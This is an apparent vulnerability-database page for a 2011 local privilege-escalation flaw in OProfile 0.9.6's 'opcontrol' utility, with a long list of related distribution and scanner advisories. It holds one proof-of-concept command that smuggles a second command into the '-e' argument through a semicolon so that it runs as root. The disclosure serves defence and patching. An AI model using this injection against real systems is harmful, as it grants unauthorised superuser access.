Lucene search
Stephane ChauveauEDB-ID:35681HistoryApr 29, 2011 - 12:00 a.m.
OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation
2011-04-2900:00:00
Stephane Chauveau
www.exploit-db.com
23
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/47652/info
OProfile is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to run arbitrary commands with superuser privileges.
The following example command is available:
sudo opcontrol -e "abcd;/usr/bin/id" Related
fedora
fedora
[SECURITY] Fedora 14 Update: oprofile-0.9.6-21.fc14
2011-07-26 03:38:12
[SECURITY] Fedora 15 Update: oprofile-0.9.6-21.fc15
2011-07-26 03:48:36
ubuntucve
ubuntucve
openvas
openvas
Debian: Security Advisory (DSA-2254-1)
2011-08-03 00:00:00
Debian Security Advisory DSA 2254-1 (oprofile)
2011-08-03 00:00:00
Fedora Update for oprofile FEDORA-2011-8076
2011-07-27 00:00:00
cve
cve
securityvulns
securityvulns
[SECURITY] [DSA 2254-1] oprofile security update
2011-06-11 00:00:00
OProfile privilege escalation
2011-06-11 00:00:00
nvd
nvd
nessus
nessus
EulerOS 2.0 SP2 : oprofile (EulerOS-SA-2019-2516)
2019-12-04 00:00:00
Fedora 15 : oprofile-0.9.6-21.fc15 (2011-8076)
2011-07-26 00:00:00
Debian DSA-2254-1 : oprofile - command injection
2011-06-10 00:00:00
debian
debian
[SECURITY] [DSA 2254-2] oprofile security update
2011-07-16 01:26:18
[SECURITY] [DSA 2254-1] oprofile security update
2011-06-04 18:09:02
cvelist
cvelist
prion
prion
Design/Logic Flaw
2011-06-09 19:55:00
Directory traversal
2011-06-09 21:55:00
Design/Logic Flaw
2011-06-09 21:55:00
ubuntu
ubuntu
OProfile vulnerabilities
2011-07-11 00:00:00
gentoo
gentoo
Multiple packages, Multiple vulnerabilities fixed in 2011
2014-12-11 00:00:00